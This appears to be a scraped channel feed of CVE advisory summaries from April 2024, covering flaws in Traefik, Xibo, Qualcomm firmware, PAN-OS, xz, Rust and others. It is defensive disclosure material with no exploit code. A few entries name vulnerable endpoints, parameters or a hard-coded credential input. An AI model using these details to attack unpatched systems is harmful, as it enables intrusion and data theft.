🚨 CVE-2024-28869Traefik is an HTTP reverse proxy and load balancer. In affected versions sending a GET request to any Traefik endpoint with the "Content-length" request header results in an indefinite hang with the default configuration. This vulnerability can be exploited by attackers to induce a denial of service. This vulnerability has been addressed in version 2.11.2 and 3.0.0-rc5. Users are advised to upgrade. For affected versions, this vulnerability can be mitigated by configuring the readTimeout option.🎖@cveNotify |
|
| 2024-04-12 21:37:26 |
🚨 CVE-2024-32005NiceGUI is an easy-to-use, Python-based UI framework. A local file inclusion is present in the NiceUI leaflet component when requesting resource files under the `/_nicegui/{__version__}/resources/{key}/{path:path}` route. As a result any file on the backend filesystem which the web server has access to can be read by an attacker with access to the NiceUI leaflet website. This vulnerability has been addressed in version 1.4.21. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-04-12 21:37:25 |
🚨 CVE-2024-29023Xibo is an Open Source Digital Signage platform with a web content management system and Windows display player software. Session tokens are exposed in the return of session search API call on the sessions page. Subsequently they can be exfiltrated and used to hijack a session. Users must be granted access to the session page, or be a super admin. Users should upgrade to version 3.3.10 or 4.0.9 which fix this issue. Customers who host their CMS with the Xibo Signage service have already received an upgrade or patch to resolve this issue regardless of the CMS version that they are running. Patches are available for earlier versions of Xibo CMS that are out of security support: 2.3 patch ebeccd000b51f00b9a25f56a2f252d6812ebf850.diff. 1.8 patch a81044e6ccdd92cc967e34c125bd8162432e51bc.diff. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-04-12 21:37:24 |
🚨 CVE-2024-29022Xibo is an Open Source Digital Signage platform with a web content management system and Windows display player software. In affected versions some request headers are not correctly sanitised when stored in the session and display tables. These headers can be used to inject a malicious script into the session page to exfiltrate session IDs and User Agents. These session IDs / User Agents can subsequently be used to hijack active sessions. A malicious script can be injected into the display grid to exfiltrate information related to displays. Users should upgrade to version 3.3.10 or 4.0.9 which fix this issue. Customers who host their CMS with the Xibo Signage service have already received an upgrade or patch to resolve this issue regardless of the CMS version that they are running. Upgrading to a fixed version is necessary to remediate. Patches are available for earlier versions of Xibo CMS that are out of security support: 2.3 patch ebeccd000b51f00b9a25f56a2f252d6812ebf850.diff. 1.8 patch a81044e6ccdd92cc967e34c125bd8162432e51bc.diff. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-04-12 20:37:24 |
🚨 CVE-2024-32000matrix-appservice-irc is a Node.js IRC bridge for the Matrix messaging protocol. matrix-appservice-irc before version 2.0.0 can be exploited to leak the truncated body of a message if a malicious user sends a Matrix reply to an event ID they don't have access to. As a precondition to the attack, the malicious user needs to know the event ID of the message they want to leak, as well as to be joined to both the Matrix room and the IRC channel it is bridged to. The message reply containing the leaked message content is visible to IRC channel members when this happens. matrix-appservice-irc 2.0.0 checks whether the user has permission to view an event before constructing a reply. Administrators should upgrade to this version. It's possible to limit the amount of information leaked by setting a reply template that doesn't contain the original message. See these lines `601-604` in the configuration file linked.🎖@cveNotify |
|
| 2024-04-12 17:37:45 |
🚨 CVE-2022-33279Memory corruption due to stack based buffer overflow in WLAN having invalid WNM frame length.🎖@cveNotify |
|
| 2024-04-12 17:37:44 |
🚨 CVE-2022-33271Information disclosure due to buffer over-read in WLAN while parsing NMF frame.🎖@cveNotify |
|
| 2024-04-12 17:37:43 |
🚨 CVE-2022-33248Memory corruption in User Identity Module due to integer overflow to buffer overflow when a segement is received via qmi http.🎖@cveNotify |
|
| 2024-04-12 17:37:40 |
🚨 CVE-2022-33246Memory corruption in Audio due to use of out-of-range pointer offset while Initiating a voice call session from user space with invalid session id.🎖@cveNotify |
|
| 2024-04-12 17:37:39 |
🚨 CVE-2022-33233Memory corruption due to configuration weakness in modem wile sending command to write protected files.🎖@cveNotify |
|
| 2024-04-12 17:37:38 |
🚨 CVE-2022-33229Information disclosure due to buffer over-read in Modem while using static array to process IPv4 packets.🎖@cveNotify |
|
| 2024-04-12 17:37:34 |
🚨 CVE-2022-33221Information disclosure in Trusted Execution Environment due to buffer over-read while processing metadata verification requests.🎖@cveNotify |
|
| 2024-04-12 17:37:33 |
🚨 CVE-2022-25738Information disclosure in modem due to buffer over-red while performing checksum of packet received🎖@cveNotify |
|
| 2024-04-12 17:37:32 |
🚨 CVE-2022-25735Denial of service in modem due to missing null check while processing TCP or UDP packets from server🎖@cveNotify |
|
| 2024-04-12 17:37:29 |
🚨 CVE-2022-25734Denial of service in modem due to missing null check while processing IP packets with padding🎖@cveNotify |
|
| 2024-04-12 17:37:28 |
🚨 CVE-2022-25732Information disclosure in modem due to buffer over read in dns client due to missing length check🎖@cveNotify |
|
| 2024-04-12 17:37:27 |
🚨 CVE-2022-25728Information disclosure in modem due to buffer over-read while processing response from DNS server🎖@cveNotify |
|
| 2024-04-12 15:37:43 |
🚨 CVE-2023-43549Memory corruption while processing TPC target power table in FTM TPC.🎖@cveNotify |
|
| 2024-04-12 15:37:42 |
🚨 CVE-2023-43547Memory corruption while invoking IOCTLs calls in Automotive Multimedia.🎖@cveNotify |
|
| 2024-04-12 15:37:41 |
🚨 CVE-2023-43546Memory corruption while invoking HGSL IOCTL context create.🎖@cveNotify |
|
| 2024-04-12 15:37:37 |
🚨 CVE-2023-43540Memory corruption while processing the IOCTL FM HCI WRITE request.🎖@cveNotify |
|
| 2024-04-12 15:37:36 |
🚨 CVE-2023-33104Transient DOS while processing PDU Release command with a parameter PDU ID out of range.🎖@cveNotify |
|
| 2024-04-12 15:37:32 |
🚨 CVE-2023-33103Transient DOS while processing CAG info IE received from NW.🎖@cveNotify |
|
| 2024-04-12 15:37:31 |
🚨 CVE-2023-33095Transient DOS while processing multiple payload container type with incorrect container length received in DL NAS transport OTA in NR.🎖@cveNotify |
|
| 2024-04-12 15:37:30 |
🚨 CVE-2023-33086Transient DOS while processing multiple IKEV2 Informational Request to device from IPSEC server with different identifiers.🎖@cveNotify |
|
| 2024-04-12 15:37:26 |
🚨 CVE-2023-33078Information Disclosure while processing IOCTL request in FastRPC.🎖@cveNotify |
|
| 2024-04-12 15:37:25 |
🚨 CVE-2023-28582Memory corruption in Data Modem while verifying hello-verify message during the DTLS handshake.🎖@cveNotify |
|
| 2024-04-12 15:37:24 |
🚨 CVE-2023-28578Memory corruption in Core Services while executing the command for removing a single event listener.🎖@cveNotify |
|
| 2024-04-12 14:37:39 |
🚨 CVE-2024-3707Information exposure vulnerability in OpenGnsys affecting version 1.1.1d (Espeto). This vulnerability allows an attacker to enumerate all files in the web tree by accessing a php file.🎖@cveNotify |
|
| 2024-04-12 14:37:38 |
🚨 CVE-2024-3706Information exposure vulnerability in OpenGnsys affecting version 1.1.1d (Espeto). This vulnerability allows an attacker to view a php backup file (controlaccess.php-LAST) where database credentials are stored.🎖@cveNotify |
|
| 2024-04-12 14:37:34 |
🚨 CVE-2024-3705Unrestricted file upload vulnerability in OpenGnsys affecting version 1.1.1d (Espeto). This vulnerability allows an attacker to send a POST request to the endpoint '/opengnsys/images/M_Icons.php' modifying the file extension, due to lack of file extension verification, resulting in a webshell injection.🎖@cveNotify |
|
| 2024-04-12 14:37:33 |
🚨 CVE-2024-3688A vulnerability was found in Xiamen Four-Faith RMP Router Management Platform 5.2.2. It has been declared as critical. This vulnerability affects unknown code of the file /Device/Device/GetDeviceInfoList?deviceCode=&searchField=&deviceState=. The manipulation of the argument groupId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260476. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-12 14:37:32 |
🚨 CVE-2024-3687A vulnerability was found in bihell Dice 3.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-260474 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-12 14:37:31 |
🚨 CVE-2024-3686A vulnerability has been found in DedeCMS 5.7.112-UTF8 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file update_guide.php. The manipulation of the argument files leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260473 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-12 14:37:27 |
🚨 CVE-2024-31839Cross Site Scripting vulnerability in tiagorlampert CHAOS v.5.0.1 allows a remote attacker to escalate privileges via the sendCommandHandler function in the handler.go component.🎖@cveNotify |
|
| 2024-04-12 14:37:26 |
🚨 CVE-2024-2397Due to a bug in packet data buffers management, the PPP printer in tcpdump can enter an infinite loop when reading a crafted DLT_PPP_SERIAL .pcap savefile. This problem does not affect any tcpdump release, but it affected the git master branch from 2023-06-05 to 2024-03-21.🎖@cveNotify |
|
| 2024-04-12 14:37:25 |
🚨 CVE-2024-29461An issue in Floodlight SDN OpenFlow Controller v.1.2 allows a remote attacker to cause a denial of service via the datapath id component.🎖@cveNotify |
|
| 2024-04-12 14:37:24 |
🚨 CVE-2023-51409Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 1.9.98.🎖@cveNotify |
|
| 2024-04-12 13:37:36 |
🚨 CVE-2024-31263Cross-Site Request Forgery (CSRF) vulnerability in aerin Loan Repayment Calculator and Application Form.This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.4.🎖@cveNotify |
|
| 2024-04-12 13:37:35 |
🚨 CVE-2024-31262Cross-Site Request Forgery (CSRF) vulnerability in Jcodex WooCommerce Checkout Field Editor (Checkout Manager).This issue affects WooCommerce Checkout Field Editor (Checkout Manager): from n/a through 2.1.8.🎖@cveNotify |
|
| 2024-04-12 13:37:31 |
🚨 CVE-2024-31239Cross-Site Request Forgery (CSRF) vulnerability in Nudgify Nudgify Social Proof, Sales Popup & FOMO.This issue affects Nudgify Social Proof, Sales Popup & FOMO: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-04-12 13:37:30 |
🚨 CVE-2024-31235Cross-Site Request Forgery (CSRF) vulnerability in WebToffee WordPress Comments Import & Export.This issue affects WordPress Comments Import & Export: from n/a through 2.3.5.🎖@cveNotify |
|
| 2024-04-12 13:37:26 |
🚨 CVE-2024-28718An issue in OpenStack magnum yoga-eom version allows a remote attacker to execute arbitrary code via the cert_manager.py. component.🎖@cveNotify |
|
| 2024-04-12 13:37:25 |
🚨 CVE-2023-47714IBM Sterling File Gateway 6.0.0.0 through 6.0.3.9, 6.1.0.0 through 6.1.2.3, and 6.2.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271531.🎖@cveNotify |
|
| 2024-04-12 13:37:24 |
🚨 CVE-2022-40211Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GiveWP allows Stored XSS.This issue affects GiveWP: from n/a through 2.25.1.🎖@cveNotify |
|
| 2024-04-12 13:07:44 |
🚨 CVE-2024-22722Server Side Template Injection (SSTI) vulnerability in Form Tools 3.1.1 allows attackers to run arbitrary commands via the Group Name field under the add forms section of the application.🎖@cveNotify |
|
| 2024-04-12 13:07:38 |
🚨 CVE-2024-22721Cross Site Request Forgery (CSRF) vulnerability in Form Tools 3.1.1 allows attackers to manipulate sensitive user data via crafted link.🎖@cveNotify |
|
| 2024-04-12 13:07:37 |
🚨 CVE-2024-22717Cross Site Scripting (XSS) vulnerability in Form Tools 3.1.1 allows attackers to run arbitrary code via the First Name field in the application.🎖@cveNotify |
|
| 2024-04-12 13:07:36 |
🚨 CVE-2023-5394Server receiving a malformed message that where the GCL message hostname may be too large which may cause a stack overflow; resulting in possible remote code execution. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-12 13:07:32 |
🚨 CVE-2023-5392C300 information leak due to an analysis feature which allows extracting more memory over the network than required by the function. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning.🎖@cveNotify |
|
| 2024-04-12 13:07:31 |
🚨 CVE-2024-30271Illustrator versions 28.3, 27.9.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-04-12 13:07:26 |
🚨 CVE-2024-31678Sourcecodester Loan Management System v1.0 is vulnerable to SQL Injection via the "password" parameter in the "login.php" file.🎖@cveNotify |
|
| 2024-04-12 13:07:25 |
🚨 CVE-2023-29483eventlet before 0.35.2, as used in dnspython before 2.6.0, allows remote attackers to interfere with DNS name resolution by quickly sending an invalid packet from the expected IP address and source port, aka a "TuDoor" attack. In other words, dnspython does not have the preferred behavior in which the DNS name resolution algorithm would proceed, within the full time window, in order to wait for a valid packet. NOTE: dnspython 2.6.0 is unusable for a different reason that was addressed in 2.6.1.🎖@cveNotify |
|
| 2024-04-12 12:37:24 |
🚨 CVE-2020-8006The server in Circontrol Raption through 5.11.2 has a pre-authentication stack-based buffer overflow that can be exploited to gain run-time control of the device as root. The ocpp1.5 and pwrstudio binaries on the charging station do not use a number of common exploitation mitigations. In particular, there are no stack canaries and they do not use the Position Independent Executable (PIE) format.🎖@cveNotify |
|
| 2024-04-12 10:37:25 |
🚨 CVE-2024-31372Cross-Site Request Forgery (CSRF) vulnerability in Arnan de Gans No-Bot Registration.This issue affects No-Bot Registration: from n/a through 1.9.1.🎖@cveNotify |
|
| 2024-04-12 10:37:24 |
🚨 CVE-2024-31371Cross-Site Request Forgery (CSRF) vulnerability in Xylus Themes WP Event Aggregator.This issue affects WP Event Aggregator: from n/a through 1.7.6.🎖@cveNotify |
|
| 2024-04-12 09:37:40 |
🚨 CVE-2024-21454Transient DOS while decoding the ToBeSignedMessage in Automotive Telematics.🎖@cveNotify |
|
| 2024-04-12 09:37:33 |
🚨 CVE-2024-21453Transient DOS while decoding message of size that exceeds the available system memory.🎖@cveNotify |
|
| 2024-04-12 09:37:32 |
🚨 CVE-2023-33115Memory corruption while processing buffer initialization, when trusted report for certain report types are generated.🎖@cveNotify |
|
| 2024-04-12 09:37:31 |
🚨 CVE-2023-33111Information disclosure when VI calibration state set by ADSP is greater than MAX_FBSP_STATE in the response payload to AFE calibration command.🎖@cveNotify |
|
| 2024-04-12 09:37:28 |
🚨 CVE-2023-33101Transient DOS while processing DL NAS TRANSPORT message with payload length 0.🎖@cveNotify |
|
| 2024-04-12 09:37:27 |
🚨 CVE-2023-33023Memory corruption while processing finish_sign command to pass a rsp buffer.🎖@cveNotify |
|
| 2024-04-12 09:37:26 |
🚨 CVE-2023-28547Memory corruption in SPS Application while requesting for public key in sorter TA.🎖@cveNotify |
|
| 2024-04-12 08:37:24 |
🚨 CVE-2024-3400A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.🎖@cveNotify |
|
| 2024-04-12 07:37:26 |
🚨 CVE-2024-27309While an Apache Kafka cluster is being migrated from ZooKeeper mode to KRaft mode, in some cases ACLs will not be correctly enforced.Two preconditions are needed to trigger the bug:1. The administrator decides to remove an ACL2. The resource associated with the removed ACL continues to have two or more other ACLs associated with it after the removal.When those two preconditions are met, Kafka will treat the resource as if it had only one ACL associated with it after the removal, rather than the two or more that would be correct.The incorrect condition is cleared by removing all brokers in ZK mode, or by adding a new ACL to the affected resource. Once the migration is completed, there is no metadata loss (the ACLs all remain).The full impact depends on the ACLs in use. If only ALLOW ACLs were configured during the migration, the impact would be limited to availability impact. if DENY ACLs were configured, the impact could include confidentiality and integrity impact depending on the ACLs configured, as the DENY ACLs might be ignored due to this vulnerability during the migration period.🎖@cveNotify |
|
| 2024-04-12 07:37:25 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-04-12 07:37:24 |
🚨 CVE-2024-21875Allocation of Resources Without Limits or Throttling vulnerability in Badge leading to a denial of service attack.Team Hacker Hotel Badge 2024 on risc-v (billboard modules) allows Flooding.This issue affects Hacker Hotel Badge 2024: from 0.1.0 through 0.1.3.🎖@cveNotify |
|
| 2024-04-12 06:37:25 |
🚨 CVE-2024-22734An issue was discovered in AMCS Group Trux Waste Management Software before version 7.19.0018.26912, allows local attackers to obtain sensitive information via a static, hard-coded AES Key-IV pair in the TxUtilities.dll and TruxUser.cfg components.🎖@cveNotify |
|
| 2024-04-12 06:37:24 |
🚨 CVE-2023-49528Buffer Overflow vulnerability in FFmpeg version n6.1-3-g466799d4f5, allows a local attacker to execute arbitrary code and cause a denial of service (DoS) via the af_dialoguenhance.c:261:5 in the de_stereo component.🎖@cveNotify |
|
| 2024-04-12 05:37:25 |
🚨 CVE-2023-44856Cross Site Scripting (XSS) vulnerability in Cobham SAILOR VSAT Ku v.164B019, allows a remote attacker to execute arbitrary code via a crafted script to the rstat, sender, and recipients' parameters of the sub_21D24 function in the acu_web file.🎖@cveNotify |
|
| 2024-04-12 05:37:24 |
🚨 CVE-2023-44855Cross Site Scripting (XSS) vulnerability in Cobham SAILOR VSAT Ku v.164B019 allows a remote attacker to execute arbitrary code via a crafted script to the rdiag, sender, and recipients parameters of the sub_219C4 function in the acu_web file.🎖@cveNotify |
|
| 2024-04-12 04:37:28 |
🚨 CVE-2023-44853\An issue was discovered in Cobham SAILOR VSAT Ku v.164B019, allows a remote attacker to execute arbitrary code via a crafted script to the sub_219C4 function in the acu_web file.🎖@cveNotify |
|
| 2024-04-12 04:37:27 |
🚨 CVE-2023-44852Cross Site Scripting (XSS) vulnerability in Cobham SAILOR VSAT Ku v.164B019, allows a remote attacker to execute arbitrary code via a crafted script to the c_set_traps_decode function in the acu_web file.🎖@cveNotify |
|
| 2024-04-12 03:37:32 |
🚨 CVE-2024-2801The Shopkeeper Extender plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'image_slide' shortcode in all versions up to, and including, 3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-12 03:37:31 |
🚨 CVE-2024-22357IBM Sterling B2B Integrator 6.0.0.0 through 6.0.3.9, 6.1.0.0 through 6.1.2.3, and 6.2.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 280894.🎖@cveNotify |
|
| 2024-04-12 03:37:30 |
🚨 CVE-2023-45186IBM Sterling B2B Integrator 6.0.0.0 through 6.0.3.9, 6.1.0.0 through 6.1.2.3, and 6.2.0.0 is vulnerable to cross-site scripting. This vulnerability allows a privileged user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 268691.🎖@cveNotify |
|
| 2024-04-12 02:37:26 |
🚨 CVE-2024-31309HTTP/2 CONTINUATION DoS attack can cause Apache Traffic Server to consume more resources on the server. Version from 8.0.0 through 8.1.9, from 9.0.0 through 9.2.3 are affected.Users can set a new setting (proxy.config.http2.max_continuation_frames_per_minute) to limit the number of CONTINUATION frames per minute. ATS does have a fixed amount of memory a request can use and ATS adheres to these limits in previous releases.Users are recommended to upgrade to versions 8.1.10 or 9.2.4 which fixes the issue.🎖@cveNotify |
|
| 2024-04-12 02:37:25 |
🚨 CVE-2024-30261Undici is an HTTP/1.1 client, written from scratch for Node.js. An attacker can alter the `integrity` option passed to `fetch()`, allowing `fetch()` to accept requests as valid even if they have been tampered. This vulnerability was patched in version(s) 5.28.4 and 6.11.1.🎖@cveNotify |
|
| 2024-04-12 02:37:24 |
🚨 CVE-2024-3209A vulnerability was found in UPX up to 4.2.2. It has been rated as critical. This issue affects the function get_ne64 of the file bele.h. The manipulation leads to heap-based buffer overflow. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259055. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-12 01:37:25 |
🚨 CVE-2023-6678An issue has been discovered in GitLab EE affecting all versions before 16.8.6, all versions starting from 16.9 before 16.9.4, all versions starting from 16.10 before 16.10.2. It was possible for an attacker to cause a denial of service using malicious crafted content in a junit test report file.🎖@cveNotify |
|
| 2024-04-12 01:37:24 |
🚨 CVE-2023-6489A denial of service vulnerability was identified in GitLab CE/EE, versions 16.7.7 prior to 16.8.6, 16.9 prior to 16.9.4 and 16.10 prior to 16.10.2 which allows an attacker to spike the GitLab instance resources usage resulting in service degradation via chat integration feature.🎖@cveNotify |
|
| 2024-04-12 01:07:24 |
🚨 CVE-2024-3272** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-11 23:37:26 |
🚨 CVE-2024-31083A use-after-free vulnerability was found in the ProcRenderAddGlyphs() function of Xorg servers. This issue occurs when AllocateGlyph() is called to store new glyphs sent by the client to the X server, potentially resulting in multiple entries pointing to the same non-refcounted glyphs. Consequently, ProcRenderAddGlyphs() may free a glyph, leading to a use-after-free scenario when the same glyph pointer is subsequently accessed. This flaw allows an authenticated attacker to execute arbitrary code on the system by sending a specially crafted request.🎖@cveNotify |
|
| 2024-04-11 23:37:25 |
🚨 CVE-2024-28834A flaw was found in GnuTLS. The Minerva attack is a cryptographic vulnerability that exploits deterministic behavior in systems like GnuTLS, leading to side-channel leaks. In specific scenarios, such as when using the GNUTLS_PRIVKEY_FLAG_REPRODUCIBLE flag, it can result in a noticeable step in nonce size from 513 to 512 bits, exposing a potential timing side-channel.🎖@cveNotify |
|
| 2024-04-11 22:37:25 |
🚨 CVE-2023-48865An issue discovered in Reportico Till 8.1.0 allows attackers to obtain sensitive information via execute_mode parameter of the URL.🎖@cveNotify |
|
| 2024-04-11 22:37:24 |
🚨 CVE-2019-13132In ZeroMQ libzmq before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.3.2, a remote, unauthenticated client connecting to a libzmq application, running with a socket listening with CURVE encryption/authentication enabled, may cause a stack overflow and overwrite the stack with arbitrary data, due to a buffer overflow in the library. Users running public servers with the above configuration are highly encouraged to upgrade as soon as possible, as there are no known mitigations.🎖@cveNotify |
|
| 2024-04-11 21:37:26 |
🚨 CVE-2024-28458Null Pointer Dereference vulnerability in swfdump in swftools 0.9.2 allows attackers to crash the appliation via the function compileSWFActionCode in action/actioncompiler.c.🎖@cveNotify |
|
| 2024-04-11 21:37:25 |
🚨 CVE-2024-25376An issue discovered in Thesycon Software Solutions Gmbh & Co. KG TUSBAudio MSI-based installers before 5.68.0 allows a local attacker to execute arbitrary code via the msiexec.exe repair mode.🎖@cveNotify |
|
| 2024-04-11 21:37:24 |
🚨 CVE-2024-24576Rust is a programming language. The Rust Security Response WG was notified that the Rust standard library prior to version 1.77.2 did not properly escape arguments when invoking batch files (with the `bat` and `cmd` extensions) on Windows using the `Command`. An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping. The severity of this vulnerability is critical for those who invoke batch files on Windows with untrusted arguments. No other platform or use is affected.The `Command::arg` and `Command::args` APIs state in their documentation that the arguments will be passed to the spawned process as-is, regardless of the content of the arguments, and will not be evaluated by a shell. This means it should be safe to pass untrusted input as an argument.On Windows, the implementation of this is more complex than other platforms, because the Windows API only provides a single string containing all the arguments to the spawned process, and it's up to the spawned process to split them. Most programs use the standard C run-time argv, which in practice results in a mostly consistent way arguments are splitted.One exception though is `cmd.exe` (used among other things to execute batch files), which has its own argument splitting logic. That forces the standard library to implement custom escaping for arguments passed to batch files. Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution.Due to the complexity of `cmd.exe`, we didn't identify a solution that would correctly escape arguments in all cases. To maintain our API guarantees, we improved the robustness of the escaping code, and changed the `Command` API to return an `InvalidInput` error when it cannot safely escape an argument. This error will be emitted when spawning the process.The fix is included in Rust 1.77.2. Note that the new escaping logic for batch files errs on the conservative side, and could reject valid arguments. Those who implement the escaping themselves or only handle trusted inputs on Windows can also use the `CommandExt::raw_arg` method to bypass the standard library's escaping logic.🎖@cveNotify |
|
| 2024-04-11 20:37:42 |
🚨 CVE-2024-20686Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-04-11 20:37:41 |
🚨 CVE-2024-20681Windows Subsystem for Linux Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-04-11 20:37:40 |
🚨 CVE-2024-20680Windows Message Queuing Client (MSMQC) Information Disclosure🎖@cveNotify |
|
| 2024-04-11 20:37:37 |
🚨 CVE-2024-20677A security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365. As of February 13, 2024, the ability to insert FBX files has also been disabled in 3D Viewer.3D models in Office documents that were previously inserted from a FBX file will continue to work as expected unless the Link to File option was chosen at insert time.This change is effective as of the January 9, 2024 security update.🎖@cveNotify |
|
| 2024-04-11 20:37:36 |
🚨 CVE-2024-20664Microsoft Message Queuing Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-04-11 20:37:35 |
🚨 CVE-2024-20662Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-04-11 20:37:31 |
🚨 CVE-2024-20658Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-04-11 20:37:30 |
🚨 CVE-2024-20656Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-04-11 20:37:26 |
🚨 CVE-2024-20653Microsoft Common Log File System Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-04-11 20:37:25 |
🚨 CVE-2024-0056Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-04-11 19:37:32 |
🚨 CVE-2024-23079JGraphT Core v1.5.2 was discovered to contain a NullPointerException via the component org.jgrapht.alg.util.ToleranceDoubleComparator::compare(Double, Double). NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-04-11 19:37:25 |
🚨 CVE-2024-23085Apfloat v1.10.1 was discovered to contain a NullPointerException via the component org.apfloat.internal.DoubleScramble::scramble(double[], int, int[]). NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-04-11 19:37:24 |
🚨 CVE-2024-23082ThreeTen Backport v1.6.8 was discovered to contain an integer overflow via the component org.threeten.bp.format.DateTimeFormatter::parse(CharSequence, ParsePosition). NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-04-11 18:37:25 |
🚨 CVE-2024-30272Illustrator versions 28.3, 27.9.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-04-11 18:37:24 |
🚨 CVE-2024-30271Illustrator versions 28.3, 27.9.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-04-11 17:37:24 |
🚨 CVE-2023-50949IBM QRadar SIEM 7.5 could allow an unauthorized user to perform unauthorized actions due to improper certificate validation. IBM X-Force ID: 275706.🎖@cveNotify |
|
| 2024-04-11 14:37:29 |
🚨 CVE-2023-29483eventlet before 0.35.2, as used in dnspython before 2.6.0, allows remote attackers to interfere with DNS name resolution by quickly sending an invalid packet from the expected IP address and source port, aka a "TuDoor" attack. In other words, dnspython does not have the preferred behavior in which the DNS name resolution algorithm would proceed, within the full time window, in order to wait for a valid packet. NOTE: dnspython 2.6.0 is unusable for a different reason that was addressed in 2.6.1.🎖@cveNotify |
|
| 2024-04-11 14:37:28 |
🚨 CVE-2024-30161In Qt 6.5.4, 6.5.5, and 6.6.2, QNetworkReply header data might be accessed via a dangling pointer in Qt for WebAssembly (wasm). (Earlier and later versions are unaffected.)🎖@cveNotify |
|
| 2024-04-11 14:07:25 |
🚨 CVE-2024-25298An issue was discovered in REDAXO version 5.15.1, allows attackers to execute arbitrary code and obtain sensitive information via modules.modules.php.🎖@cveNotify |
|
